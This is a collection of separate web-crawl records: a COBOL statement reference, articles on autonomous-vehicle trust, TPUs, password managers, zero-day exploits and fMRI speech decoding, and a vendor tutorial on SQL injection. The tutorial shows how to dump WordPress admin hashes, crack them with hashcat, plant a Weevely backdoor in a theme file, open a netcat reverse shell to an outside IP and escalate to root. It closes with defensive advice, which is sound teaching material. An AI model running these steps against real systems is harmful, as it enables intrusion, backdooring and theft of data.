"Our truly rugged devices have paid for themselves in short order, compared with nonrugged devices, with better customer satisfaction and efficiency and longer lifecycles."
<urn:uuid:b9d19061-6e72-4da8-a639-2bcda8a4652b>
CC-MAIN-2024-38
https://fedtechmagazine.com/article/2014/02/us-forest-service-and-air-force-turn-rugged-devices-efficient-fieldwork
2024-09-11T17:45:20Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00643.warc.gz
en
0.956054
1,024
2.96875
3
The REWRITE statement logically replaces a record in a file. REWRITE record [ FROM source-field ] [ INVALID KEY statement-1 ] [ NOT INVALID KEY statement-2 ] [ END-REWRITE ] - record must be the name of a logical record in the Data Division File Section. The associated file may not be a sort file. - source-field is a data item or literal. - statement-1 and statement-2 are imperative statements. - The INVALID KEY and NOT INVALID KEY phrases may not be specified for sequential files or relative files with sequential access. - record and source-field may not share any storage area. - The file associated with record must be a mass storage file and must be open in the I-O mode. - For files with sequential access mode, the preceding I/O statement executed for the file must have been a successful READ statement. The REWRITE statement replaces the last record read by the contents of record. If the file is an indexed file, the primary key must not have been changed since the last READ. - For random or dynamic access mode files, the REWRITE statement replaces the record specified by the file's key. For relative files, this is the record specified by its RELATIVE KEY data item. For indexed files, the record identified by the primary key is replaced. - For an indexed file with alternate keys, the order in which duplicated keys are subsequently returned is affected as follows: - If the value of an alternate key has not changed, its order of retrieval is unchanged. - If the value is changed, and the new value is a duplicated value, the record's logical position is unpredictable within the set of records with that value. - The REWRITE statement does not affect the current file position. - The following occurrences cause the - The access mode is sequential and an indexed file's primary key is not identical to the value returned from the preceding - The record being replaced does not exist in the file. - The value of an alternate key that does not allow duplicates equals that of another record already in the file. invalid-key condition causes the REWRITE to fail and does not update the file. - If the invalid-key condition occurs, and there is an INVALID KEY phrase, statement-1 executes. If there is no INVALID KEY phrase, but there is an appropriate USE AFTER EXCEPTION procedure, that procedure executes. Otherwise, an invalid-key condition causes a message to be printed and the program halts. - If the NOT INVALID KEY phrase is specified, statement-2 executes if the REWRITE statement is successful. - For a sequential file, the size of the record must be the same as the one it is replacing. The size of the record written is determined by the size of record. - The REWRITE statement updates the value of the FILE STATUS data item for the file. - If the FROM phrase is specified, it is identical to first moving the value of source-field to record using the rules of the MOVE statement and then performing the REWRITE as if there were no FROM phrase.
<urn:uuid:45c0e936-15af-4030-8e5d-1d9f21d6330a>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/extend-acucobol/1031/extend-Interoperability-Suite/BKRFRFPROC00000001S165.html
2024-09-11T16:16:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00643.warc.gz
en
0.888898
689
2.75
3
Humans have an issue with trust. While innate to our nature, trust is also something that must be earned over time, and once lost it can take a long time to get it back, if at all. This is particularly true where new technologies like autonomous vehicle safety are concerned. We see time and again that regardless of the extensive number of hours that autonomous vehicle testing is done safely, a single incident can overwhelm a news cycle. Think of last year’s Uber crash or the more recent Tesla crashes. They do not become associated with a single company, rather, they become a trust challenge for a whole industry. New Technologies Bring New Challenges to Safety and Security In the findings from an investigation into one crash, a Tesla was found to have repeatedly made maneuvers at one particular area of a highway that eventually resulted in the vehicle crashing into a concrete barrier. On several occasions, the driver was able to maintain control and override the maneuvers to safely keep the vehicle in lane, but during the final incident, the driver was distracted and was not able to avoid the crash. Of further concern is that the car first increased speed from 62 mph to 71 mph just prior to steering into the barrier. In an investigation by the National Transportation Safety Board (NTSB) of an unrelated accident, the NTSB found that the fatal collision of a car with autonomous driving features and a slow-moving truck was also partly the result of the driver not regaining control of the vehicle in time. It referenced an earlier accident where systems that “underpin AEB systems have only been trained to recognize the rear of other vehicles… in part because radar-based systems have trouble distinguishing objects in the road from objects that are merely near the road." This represents a challenge with autonomous vehicle technology in its current state. Drivers tend to lose focus on the road, giving too much responsibility to low-level automation features, allowing technology to work in a domain beyond its capabilities. The end results are both tragic and fear-inducing. Distracted driving is just as life-threatening in a vehicle with automated features as it is in a conventional vehicle. The misunderstanding lies on two fronts: first, some companies are overly bullish in their confidence of the self-driving features of the car, leaving their consumers at risk. This is miseducation, and it is dangerous in itself. The second inappropriate interaction comes from a misunderstanding of what autonomous features are designed to do in today’s vehicles. Lower level autonomy is there to augment a human driver, not replace them. It helps the driver with things we as humans are really bad at, like paying attention for long periods of time, or checking all our blind spots. However, at this point, there are a lot of things that humans do better than cars, like contextual understanding and object identification. In any case, the technology gets blamed much more than the humans do, and it results in a lack of trust that hurts the entire industry. Mistrust, with a Side of Mistrust Another modern phenomenon that impacts the trust of a consumer is a security incident, and if a misbehaving autonomous feature was the result of a cyberattack, the court of popular opinion could put an end to autonomous vehicles. Even with drivers maintaining control, there is a risk that these highly connected vehicles could be infected with malware when connecting to a mobile device, downloading traffic reports, or with updates for a potential maintenance issue by the manufacturer, which could have devastating consequences. The mind can go to several nightmare scenarios: attackers crashing cars into each other, threat actors stopping cars on the highway and blocking major arteries, and other similar scenarios. But more likely, attackers could use malware to steal payment credentials stored in the car's systems for use in automatic payments at gas stations, drive-through restaurants, car washes, or similar businesses where the driver may not need to exit the vehicle to make a purchase. And an almost-inevitable scenario could be that marketing data collection companies could monitor communications to know where you drive and when, how long you stayed, what communications you saw or listened to, etc. Adapting Current Security Solutions to New Technologies This brings the world of connected autonomous vehicles right up there with every network that requires the protections offered by security technologies such as firewalls, antivirus (EPP), endpoint detection and response (EDR), distributed ledger technology (DLT), etc. The massive mobile endpoint that is the modern vehicle comes with more than its share of security concerns and begs the question: are today's security solutions going to translate well to an autonomous vehicle? On the one hand, that car should appear to those security systems as one big network, albeit one that weighs more than a ton and can move faster than 100 mph. As a practical matter, though, the nature of the systems that make up that vehicle are going to be radically different. As such, manufacturers must work closely with firms on advanced security systems that are designed to work specifically with autonomous vehicles. While the challenges inherent with assuring that autonomous vehicle safety and security are significant, the good news is that a host of leading thinkers across multiple industries associated with developing the technologies required have been hard at work solving these issues for quite some time. BlackBerry recently published the Road to Mobility: The 2020 Guide to Trends and Technology for Smart Cities and Transportation, which examines key points to consider as we enter the world of autonomous vehicles, including: - Roadblocks and Pathways to Vehicle Electrification Adoption by Austin Brown, Executive Director, Policy Institute for Energy, the Economy, and the Environment at UC Davis. - Challenges to Smart Mobility and Smart Cities by Roger Lanctot, Associate Director in the Global Automotive Practice at Strategy Analytics. - Regulatory Policy, Safety and Security in Connected and Autonomous Vehicles by Parham Eftekhari, Executive Director of the Institute for Critical Infrastructure Technology (ICIT), the nation's leading cybersecurity Think Tank. The publication includes numerous other articles from thought leaders with the Auto-ISAC, ITSA, Carnegie Mellon, Cyber Future Foundation, and more. Safety, Security, and Trust The future of transportation and mobility is one of the most exciting fields of technology, one that is both growing rapidly and producing advancements that occur at dizzying speeds. It is critical that safety and security are top of mind from the beginning of the process and throughout the development and production processes if the industry is going to foster and maintain the trust required for the adoption of these technologies. Safety, security, and trust are fundamental to this effort and inseparable in their importance.
<urn:uuid:2366e751-4598-427e-8350-e46b50c5b2cc>
CC-MAIN-2024-38
https://blogs.blackberry.com/en/2020/05/autonomous-vehicle-accidents-test-human-trust
2024-09-12T23:17:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00543.warc.gz
en
0.959552
1,343
2.71875
3
In this series, we will be showing step-by-step examples of common attacks. We will start off with a basic SQL Injection attack directed at a web application and leading to privilege escalation to OS root. SQL Injection is one of the most dangerous vulnerabilities a web application can be prone to. If a user’s input is being passed unvalidated and unsanitized as part of an SQL query, the user can manipulate the query itself and force it to return different data than what it was supposed to return. In this article, we see how and why SQLi attacks have such a big impact on application security. Example of Vulnerable Code Before having a practical look at this injection technique, let’s first quickly see what is SQL Injection. Let’s suppose that we have a web application that takes the parameter article via a $_GET request and queries the SQL database to get article content. The underlying PHP source code is the following: // The article parameter is assigned to $article variable without any sanitization or validation $articleid = $_GET[‘article’]; // The $articleid parameter is passed as part of the query $query = "SELECT * FROM articles WHERE articleid = $articleid"; A typical page in this web application would look as follows: If a user sets the value of the article parameter to 1 AND 1=1, the query becomes: $query = "SELECT * FROM articles WHERE articleid = 1 AND 1=1"; In this case, the content of the page does not change because the two conditions in the SQL statement are both true. There is an article with an id of 1, and 1 equals to 1 which is true. If a user changes the parameter to 1 AND 1=2, it returns nothing because 1 is not equal to 2. That means that the user is controlling the query string and can adjust it accordingly to with SQL code to manipulate the results. Let’s see step-by-step how dangerous the exploitation of an SQL Injection can be. Just for reference, the following scenario is executed on a Linux machine running Ubuntu 16.04.1 LTS, PHP 7.0, MySQL 5.7, and WordPress 4.9. For the purposes of this demonstration, we have performed a security audit on a sample web application. During our penetration test, we have identified a plugin endpoint that accepts the user ID via a $_GET request and displays their user name. The endpoint is directly accessible, which could indicate weak security. The first thing someone would do is to manipulate the entry point (user input: $_GET parameter) and observe the response. What we are looking for is to see if our input causes the output of the application to change in any way. Ideally, we want to see an SQL error which could indicate that our input is parsed as part of a query. There are many ways to identify whether an application is vulnerable to SQL injection. One of the most common and simple ones is the use of a single quote which under certain circumstances breaks the database query: The MySQL error that we get confirms that the application is indeed vulnerable: At this point, it is almost certain that soon we will be able to exfiltrate data from the backend database of the web application. If our input is being parsed as part of the query, we can control it using SQL commands. If we can control the query, we can control the results. We have identified the SQL injection vulnerability, now let’s proceed with the attack. We want to get access to the administration area of the website. Let’s assume that we don’t know the structure of the database or that the administrator used non-default naming/prefixes when installing WordPress. We need to find table names to be able to grab the administrator’s password later. First, we need to find out how many columns the current table has. We will use column ordering to achieve that. ORDER BY is used to set the order of the results. You can order either by column name or by the number of the column. In this case, we need to use the number of the column. If the number that we pass in the parameter is less than the total number of columns in the current table, the output of the application should not change because the SQL query is valid. However, if the number is larger than the total number of columns, we will get an error because there is no such column. In our case, we have identified 10 columns: If we use a higher number, we don’t get any results: Depending on the setup, we might get an error: Now that we know how many columns the current table has, we will use UNION to see which column is vulnerable. UNION SELECT is used to combine results from multiple SELECT statements into a single result. The vulnerable column is the one whose data is being displayed on the page. As we can see, the number “10” is being displayed on the page which means this is the vulnerable column: We can confirm this by replacing it with version() which will show the MySQL version: Next, we need to find the table names which we will then use to exfiltrate data: function concatenates results into a string. The Information_schema is a database that stores information about other databases. The database() function returns the name of the current database. Now that we have the table structure, we can query the database to get the admin’s credentials from the table wp_users The query returns the admin’s password hash. To find the password for this hash, we will use a well-known password recovery software named hashcat. This software offers various methods of cracking a password. We will try a dictionary attack with a relatively small list containing 96 million passwords. After downloading hashcat as well as the password list, we run the following command: hashcat64 -m 400 -a 0 hash.txt wordlist.txt -m = the type of the hash we want to crack. 400 is the hash type for WordPress (MD5) -a = the attack mode. 0 is the Dictionary (or Straight) Attack hash.txt = a file containing the hash we want to crack wordlist.txt = a file containing a list of passwords in plaintext We’ve been lucky and were able to recover the password within a few minutes. The recovered password is 10987654321: Unless two-factor authentication is in place, the admin’s password should be sufficient to access the website’s backend. Once we do that, the options are limitless. It is important to note that at the current stage we have full admin access to the website’s backend user database which means we can impersonate any user login, access any page/post including those with sensitive data, export all the data including users, insert into tables, drop tables, and pretty much do anything we want. Let’s see how far we can get. There are third-party WordPress plugins that could allow us to execute shell commands or upload new files. However, we will avoid those. Instead, to further escalate this attack we will use Weavely, a popular lightweight PHP backdoor. After downloading and unpacking the software, we will first create an agent that will be injected into the WordPress site, which will give us the ability to execute system commands under the low-privileged web server account (www-data The following command will create a file which must be uploaded on the target system. secuser@secureserver:~/weevely3-master# ./weevely.py generate abcd123 agent.php --> Generated backdoor with password 'abcd123' in 'agent.php' of 1332 byte size. Instead of uploading the file, we will use existing WordPress template files to inject the contents of agent.php . We navigate to the appearance editor (which is by default enabled) and inject the code of agent.php into the header.php Now the backdoor agent is in place. We need to initiate a connection to it from our local computer. We injected the agent into the theme header, so we can specify any WordPress page as a target because the header is included in all template files. Usage: ./weevely.py [URL] [AGENT_PASSWORD] root@secureserver:~/weevely3-master# ./weevely.py http://acunetix.php.example/wordpress/ abcd123 As we can see below, we have successfully initiated a connection to our backdoor agent. Running the id command returns the current user which is www-data . We also see that the hostname is windoze and the current working directory is /var/www/html/wordpress On the victim’s end, this is what the requests sent to the backdoor look like in the log: On our local machine we also start a Netcat listener so that we can create a reverse shell connection from the target to our computer: root@secureserver:~/weevely3-master# nc -l -v -p 8181 listening on [any] 8181 ... We now send the following command to our backdoor agent to initiate a reverse shell connection: www-data@targetmachine:/var/www/html/wordpress $ backdoor_reversetcp 192.168.2.112 8181 The Netcat listener shows that a connection has been established: We now have a low privileged shell on the target machine. What we want is to escalate our privileges and get root access. The uname -a command returns enough information for us to proceed with the attack. We are interested in the kernel version. We have found a privilege escalation exploit which works on this kernel version (22.214.171.124). We download and compile it on our local machine. Now we use the reverse shell connection to download the exploit to the target machine. We grant the execute permission on the exploit by running chmod +x chocobo_root and then we run it : After a few moments, the privilege escalation is successful, and we can see that we are running as root: At this point, we have full root access to the target machine which means that the security triangle of confidentiality, integrity, and availability has been completely compromised. This can be disastrous for an organization because an attacker can: - Read/edit/delete confidential/private files on the server which may include - Files containing passwords - SSL Certificates - Databases with data of third parties which may contain sensitive information such as credit card numbers, addresses, names, telephones - Financial information such as invoices, payroll, and agreements - Private images or videos - Use the machine to attack/access other computers/servers internally (pivoting) - Use the machine to deliver malware to users - Create new users, monitor traffic, etc. It is important to note that the machine was running on a default setup without any changes, which made the attack easier. The following factors were critical to the successful exploitation of this vulnerability: - The web application was vulnerable to SQL Injection, one of the most dangerous vulnerabilities for an application. A vulnerability scanning tool would have detected it and given information on how to fix it. - There was no WAF (Web Application Firewall) in place to detect the SQL Injection exploitation. A WAF could block the attack even if the application is vulnerable. - There was no Intrusion Detection or Intrusion Prevention system in place. Many such systems keep a database with hashes of all the monitored files. If a file is modified, its hash changes and the system notifies the administrator about potentially malicious activity. This means that changes done to (Weavely backdoor injected) could have been detected. - The OS was not up to date, which allowed the privilege escalation to be successfully exploited. Getting an online free SQL Injection test with Acunetix, allows you to easily identify critical vulnerabilities in your code which can put your Web Application and/or server at risk. Frequently asked questions An SQL Injection may lead to loss of confidential data including client data, which may affect compliance and lead to huge fines. An SQL Injection may also lead to complete system compromise (as described in this article). If you suspect that you were a victim of an SQL Injection, first, check your applications using a web vulnerability scanner like Acunetix to confirm that there is a vulnerability. If you confirm that there is a vulnerability and you suspect that an attacker used it, you need to perform a manual analysis of your system. To prevent SQL Injections, the application must never directly include user input in queries. Instead, all developers must use parameterized queries (prepared statements) and/or stored procedures. The Acunetix site has tons of information about all flavors of SQL Injection. This is because Acunetix has always focused strongly on helping you prevent this critical vulnerability. Simply search our site to find more. Get the latest content on web security in your inbox each week.
<urn:uuid:a4029c47-698e-477e-8733-df7136b26321>
CC-MAIN-2024-38
https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/
2024-09-14T03:43:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00443.warc.gz
en
0.881691
2,790
3.421875
3
Imagine that a race car driver showed up to the Indianapolis 500 race with a pickup truck. No matter how big the engine in that pickup, the design limitations of the car would quickly become apparent. It’s simply not light enough, agile enough, or aerodynamic enough to compete. We see a similar problem with processors. General computing processors have made amazing strides over the past few decades, exponentially increasing their capabilities. However, the prevalence of machine learning and AI keep pushing the need for latency while processors like CPUs and GPUs are hitting their ceilings. This problem led Google to unveil the first Tensor Processing Unit (TPU) in 2016, making two new iterations since. What is a TPU, and why should machine learning experts care? The TPU Is The Race Car of Computer Processing A TPU is a specialized processor that limits its general processing ability to provide more power for specific use cases — specifically, to run machine learning algorithms. Traditional processors are constantly storing values in registers. Then a program tells the Arithmetic Logic Units (ALUs) which registers to read, the operation to perform, and where to put the result. This process is necessary for general-purpose processors but creates bottlenecks and slows down performance for machine learning. Like a race car designer who gets rid of any excess weight that will slow down the car, the TPU eliminates the need for the constant read, operate, and write operations, speeding up performance. How does a TPU do this? It uses a systolic array to perform large, hardwired matrix calculations that allow the processor to reuse the result of reading a single register and chain together many operations. The system thus batches these calculations in large quantities, bypassing the need for memory access and speeding up the specialized processing. These properties are part of what makes a TPU 15-30 times faster than top-of-the-line GPUs and 30-80 times more efficient. However, these powerhouses aren’t suitable for every use case. Similar to how race cars aren’t practical for most other environments, the TPU shines only in specialized conditions. The following conditions may make using a TPU impractical: - Your workload includes custom TensorFlow operations written in C++ - Your workload requires high-precision arithmetic - Your workload uses linear algebra programs that require frequent branching or are dominated element-wise by algebra Does Your Infrastructure Need a Race Car or a Utility Vehicle? The power and efficiency of TPUs are undeniable. When clustered together, a TPU 3.0 pod can generate up to 100 petaflops of computing power. But this power is limited to jobs unique to machine learning. So the question of whether or not to use a TPU in your organization comes down to the use case, which the following questions can help you analyze: - What job are you procuring compute infrastructure for? - Will your computing needs stay consistent, or do you need flexibility? - What scripts and languages will your software be running? Race cars are fun, but they’re not practical for every task. If you have complex computing needs for AI and ML applications, we can help. Equus provides the robust compute and storage capabilities you need to power these advanced technologies. Our team can help you find the right balance of processing power, high-density storage, and networking tools to ensure powerful yet cost-effective tools. Contact us to learn more.
<urn:uuid:1575ddb5-a3a1-4096-b535-72a5d8ea73ea>
CC-MAIN-2024-38
https://www.equuscs.com/tpus-boost-ml-computational-speeds/
2024-09-15T09:25:53Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00343.warc.gz
en
0.92473
706
3.546875
4
In today’s digital world, where multiple accounts and passwords are the norm, password managers are becoming indispensable tools for security and efficiency. A password manager is software that helps users create, store, and manage unique passwords for various online services. This tool is important not only to ensure the security of personal data, but also to optimize the work process. With the help of a password manager, you can forget about the need to remember many complex combinations, because it stores all your passwords in an encrypted vault, which can be accessed with only one master password. Additionally, many password managers offer a feature to generate random and strong passwords, which is critical to protecting your accounts from being hacked. This reduces the risks associated with using the same password for multiple sites, which is a common problem in cyber security. Password managers are also often equipped with additional security features, such as two-factor authentication, end-to-end encryption, and auto-filling of forms, allowing users to not only protect their passwords, but also simplify the process of using them. These tools are important not only for individual users, but also for businesses, where managing a large number of accounts and keeping them secure is a key aspect of protecting important corporate information. Using a password manager significantly reduces the risks associated with cybercrime, such as phishing, hacking attacks, and data leakage, ensuring your digital identity is securely protected. In this article, we’ll take a detailed look at how to choose the best password manager for your needs and how to get the most out of its features. The history of creating password managers is closely related to the development of the Internet and the growing need for safe management of many passwords. The idea of a password manager arose as a response to a problem faced by many Internet users: the need to remember a large number of complex and different passwords for different accounts. The first password managers appeared in the 1990s, when the Internet was just beginning to gain popularity. These programs were simple applications that allowed you to store passwords and other sensitive information in an encrypted form. Their main goal was to provide users with a secure place to store their passwords, helping to avoid having to use the same password for multiple sites. With the development of cyber threats and the increase in the number of online accounts, password managers have become more sophisticated and functional. They began to offer additional features such as generating random passwords, autofilling forms on websites, two-factor authentication, and syncing data between devices. Today, in the era of high technology and big data, password managers are a key tool in the fight against cybercrime, helping users to ensure that their personal data is securely protected. They have become very popular among users around the world as an effective way to manage personal security in the digital space. A password manager is a tool designed to securely store and manage passwords for various online accounts. Acting as a digital safe, it stores your login credentials as well as other sensitive data such as credit card information and important files. With one master password, you can access your saved passwords and even create strong, unique passwords for different accounts. This not only simplifies the login process, but also significantly improves your online security and reduces the risk of password cracking. In addition, Password Managers often support features such as cross-platform access, secure password sharing, and two-factor authentication code storage, making them a valuable tool for providing strong protection against cyber threats. Password managers perform several tasks, including storing and protecting passwords. Password storage – The password manager securely stores your login credentials for various accounts on the Internet, such as sites and applications, in encrypted storage. This eliminates the need to remember multiple passwords and ensures that they are protected from unauthorized access. Only you can decrypt the information that is in the password store with the help of the master password. Password Protection – A dedicated password manager offers a secure approach to protecting confidential information. Dedicated password managers are designed to keep your data secure with multi-level encryption. These solutions use advanced techniques such as zero-disclosure encryption. This means that even the service provider cannot access the passwords stored in it. This encryption method ensures that only you can access confidential information. There is also a browser password manager that uses zero-disclosure encryption. This makes them vulnerable to potential hacking. Also, browser-based Password Managers often don’t log out, and if your device is lost, stolen, or infected with malware, all of your passwords will be compromised. Password managers can create complex and strong passwords because they have a built-in password generator. Generated passwords are often a combination of letters, numbers, and special characters, making them difficult for cybercriminals to guess or crack. Password Manager always scans existing passwords and detects bad or duplicate passwords across multiple accounts. This allows you to find vulnerable passwords and replace them with more reliable ones that are difficult for cybercriminals to compromise. Many password managers, such as Keeper Password Manager, also support two-factor authentication, generating and storing one-time passwords based on time. This provides an extra level of security for your online account, as well as your password, as an additional check is performed when you log in. Typically, two-factor authentication requires you to download an authenticator app, such as Google Authenticator. However, a password manager that stores the two-factor authentication code eliminates this need. The password manager generates a two-factor authentication code and automatically enters it when you sign in to your account. Some password managers also allow you to securely store additional sensitive information such as files, images, and videos. This feature can be used to protect important documents, ID photos or other personal data. In addition, the best password manager allows you to share this information securely with other users. Not using a password manager can expose you to a number of potential risks and dangers that compromise your personal and financial security online. Here are some of them: Weak and Repeated Passwords: Without a password manager, people often use simple or repeated passwords due to difficulty remembering complex combinations. This greatly increases the risk of accounts being hacked. High Risk of Phishing: Users without a password manager can more easily end up on fake sites and provide their information to fraudsters, as password managers usually don’t allow you to automatically enter passwords on suspicious websites. Forgotten Passwords: This can lead to frequent password resets, which can be not only inconvenient but also increases your security risk, especially if the recovery procedure is vulnerable or compromised. Data Leakage: If one of your accounts is compromised, if you use the same or similar passwords, it can lead to a chain effect where attackers gain access to several of your accounts. Inability to Create Complex Passwords: Without a password manager, creating and remembering complex, unique passwords for each account becomes an almost impossible task. Loss of Account Control: In the event of a password breach or loss, the lack of centralized password management can make it difficult to regain access and control over your accounts. Threat to Mobile Security: In today’s world where a lot of online activity happens through mobile devices, the lack of a password manager can also lead to data leakage through mobile applications. Overall, not using a password manager significantly lowers your cybersecurity level and puts you at risk of cyberattacks and the loss of sensitive information. The lack of two-factor authentication (2FA) on a password manager can lead to significant security risks, as 2FA is an important layer of protection in today’s cybersecurity practices. Here’s how it can be dangerous: Increased Hacking Risk: One-factor authentication, which uses only a password, makes it much easier for attackers. 2FA adds an extra layer of verification, often in the form of an SMS message, an authenticator application, or a physical key, making hacking much more difficult. High Risk of Data Theft: If your password manager becomes the target of an attack, having only one layer of protection (the password) makes your stored data significantly more vulnerable to theft. Losing Access to Important Accounts: If someone gains access to your password manager, they can change passwords and intercept access to all your accounts, including bank and email accounts. Phishing Attacks: Without the added layer of protection that 2FA provides, password manager users are more vulnerable to phishing attacks that aim to steal their credentials. Difficulty Detecting Unauthorized Access: 2FA often includes notification of login attempts, which helps detect suspicious activity. Without this, the user may not be aware of unauthorized access to their password manager. Increased Risk of Data Loss: If hacked, attackers can not only gain access to your password manager, but also delete or modify the data stored there. Taken together, the lack of 2FA on a password manager significantly reduces the overall level of security and increases the chances of unauthorized access and data loss. Yes, using a password manager is worth it because you will never forget your passwords. They will always be reliable, and you won’t have to use a separate app for two-factor authentication codes. Gone are the days of forgetting your password, using the same password for multiple accounts, or always resetting your password with a password manager. Your password is securely stored and you can easily access it at any time. This eliminates the need to remember complex passwords on your own. The password manager generates a strong and unique password for each account. This ensures that your online account is always protected with a strong password that follows best practices such as using upper and lower case letters, numbers, special character combinations, and 16 or more characters in length. Many password managers allow you to create and store two-factor authentication codes within the same program. This means you don’t have to switch between multiple apps or devices to access your two-factor authentication code, simplifying the sign-in process and improving overall security. Choosing the right password manager is very important for protecting your online credentials and managing them conveniently. You should choose a password manager that provides zero-disclosure encryption, device compatibility, automation, and support for multi-factor authentication. Zero Disclosure Encryption. Zero-disclosure encryption is a security approach that ensures data privacy by ensuring that only you can access and decrypt it. A zero-disclosure password manager ensures that even a service provider cannot take advantage of the stored data. This gives you complete control over them. Device compatibility. You should choose a password manager that is compatible with the devices you use regularly, such as smartphones, tablets, laptops, and desktops. A cross-platform password management solution ensures access to passwords from anywhere and on any device. Automation. A robust password manager has an automation feature such as autofill. AutoFill simplifies the process of logging in to sites and applications, because you do not need to manually enter credentials, which increases the convenience of work without compromising security. Support for multi-factor authentication. Make sure the password manager you choose supports multi-factor authentication. Multi-factor authentication provides an additional level of security, as it requires additional verification in addition to entering a master password. This feature significantly increases the password manager’s protection against unauthorized access. These are just a few of the many important features you should be aware of when choosing a password manager. In addition, it is necessary to learn more about the reputation of the password manager and read customer reviews to avoid doubts about its reliability.
<urn:uuid:d6e43493-5c02-4475-90c4-92ad1a295e44>
CC-MAIN-2024-38
https://hackyourmom.com/en/pryvatnist/menedzher-paroliv-shho-cze-take-i-dlya-yakyh-czilej-vin-potriben/
2024-09-20T07:29:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00843.warc.gz
en
0.944578
2,352
2.875
3
Zero-day exploits are akin to ticking time bombs. These threats lurk in the shadows, waiting to be discovered by malicious actors and unleashed on unsuspecting systems. Understanding the life cycle of a zero-day exploit—from its initial discovery to the deployment of defenses—is crucial for businesses and individuals alike to fortify their digital landscapes. Stage 1: Discovery of the Vulnerability The life cycle of a zero-day exploit begins with the discovery of a vulnerability. Unlike known vulnerabilities, which have been identified and cataloged, a zero-day vulnerability is unknown to software developers and vendors. This stage is particularly dangerous because there is no available patch or fix, leaving the affected systems exposed. Example: The infamous Heartbleed bug, discovered in 2014, was a zero-day vulnerability in the OpenSSL cryptographic library. Before its public disclosure, this vulnerability had existed for over two years, allowing attackers to exploit it without detection. Stage 2: Development of the Exploit Once a zero-day vulnerability is discovered, the next stage is the development of the exploit. Cybercriminals or state-sponsored hackers often invest significant time and resources into crafting a reliable exploit that can take advantage of the vulnerability. This stage involves reverse engineering, code analysis, and testing to ensure the exploit can bypass existing security measures. Example: The Stuxnet worm, which targeted Iran’s nuclear facilities in 2010, was a sophisticated zero-day exploit that took advantage of multiple zero-day vulnerabilities in Windows systems. Its development was a highly complex and well-funded operation, believed to have been carried out by nation-states. Stage 3: Weaponization and Deployment After the exploit is developed, it enters the weaponization and deployment stage. In this phase, the exploit is integrated into malware, phishing emails, or other attack vectors and is then deployed against targeted systems. This stage is where the zero-day exploit begins to cause real damage, often leading to data breaches, system compromise, or even physical damage in the case of critical infrastructure attacks. Example: In 2021, a zero-day vulnerability in Microsoft Exchange Server was exploited by the Hafnium group, resulting in widespread data breaches across multiple organizations. The attackers used the zero-day exploit to gain unauthorized access to email accounts, exfiltrating sensitive information. Stage 4: Discovery by Security Teams Eventually, security teams or researchers may detect the zero-day exploit, either through unusual system behavior, forensic analysis, or threat intelligence sharing. This stage is critical for initiating a response to the attack, but by this point, significant damage may have already occurred. Example: The Log4Shell vulnerability, a zero-day exploit discovered in the Apache Log4j logging library in December 2021, was identified by security researchers after it had been actively exploited in the wild. The vulnerability allowed attackers to execute arbitrary code remotely, posing a severe threat to millions of devices globally. Stage 5: Disclosure and Patch Development Once the zero-day exploit is identified, the next step is disclosure. This involves informing the affected vendor or organization about the vulnerability so that they can develop a patch. Responsible disclosure often involves working with cybersecurity organizations and government agencies to minimize the impact of the exploit before a patch is released. Example: When Google Project Zero discovered a critical zero-day vulnerability in Windows 10 in 2020, they responsibly disclosed it to Microsoft. Microsoft then worked to develop and release a patch to protect users from potential exploits. Stage 6: Deployment of Defenses The final stage in the life cycle of a zero-day exploit is the deployment of defenses. This includes the release of patches, updates, and security advisories to users and organizations, as well as the implementation of additional security measures like intrusion detection systems, firewalls, and endpoint protection. It is during this stage that the exploit’s effectiveness diminishes as systems are fortified against the previously unknown threat. Example: After the Equifax data breach in 2017, which was partially caused by a zero-day exploit in the Apache Struts framework, organizations worldwide rushed to update their systems and improve their security posture to prevent similar incidents. The life cycle of a zero-day exploit highlights the critical importance of proactive cybersecurity measures. While the discovery and development of these exploits are often beyond the control of individual organizations, staying vigilant, applying patches promptly, and utilizing advanced security tools can help mitigate the risk. Understanding this life cycle equips organizations with the knowledge needed to defend against one of the most formidable threats in the digital age. - : Heartbleed Bug Analysis - : Stuxnet Worm: An In-Depth Analysis - : Microsoft Exchange Server Vulnerability - : Log4Shell Vulnerability Explained - : Google Project Zero and Windows 10 Vulnerability - : Equifax Data Breach Overview Explore a wealth of information on our website https://www.hammett-tech.com/our-blog/ Visit our Socials!
<urn:uuid:2f682658-f976-4162-9883-71fdeb2ebaf1>
CC-MAIN-2024-38
https://www.hammett-tech.com/unveiling-the-life-cycle-of-a-zero-day-exploit-from-shadowy-discovery-to-robust-defense/
2024-09-20T06:11:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00843.warc.gz
en
0.935513
1,013
3.25
3
- Earlier, considerable success was observed in this territory when implants were used. - The researchers described how this method is non-invasive and the first of its type to be able to recognize streams of words as well as small groups of words or sentences. Artificial intelligence and fMRI scans have been combined by University of Texas’ researchers at Austin to convert brain activity into continuous text. The findings were released today in the journal Nature under the heading “Semantic reconstruction of continuous language from non-invasive brain recordings.” The researchers described how this method is non-invasive and the first of its type to be able to recognize small streams of words as well as small groups of words or sentences. The decoder was trained by allowing participants to listen to podcasts while being scanned by an fMRI scanner, a device that detects brain activity. This is a fascinating development because there were no surgical implants involved. Each participant listened to 16 hours of podcasts while they were being scanned, and the decoder was taught to translate their brain activity into meaning using ChatGPT’s predecessor, GPT-1. In essence, it evolved into a mind reader. Earlier, considerable success was observed in this territory when implants were used. The technology might help people who lost the ability to use limbs and those who have lost speaking ability to virtually ‘write’. Alexander Huth, neuroscientist at the university, reported, “This isn’t just a language stimulus. We’re getting at meaning, something about the idea of what’s happening. And the fact that that’s possible is very exciting.” Though not perfect, tests demonstrated that the technology is pretty much close to decoding. This can be cited by the example when the decoder heard, “I don’t have my driver’s license yet,” it translated to, “She 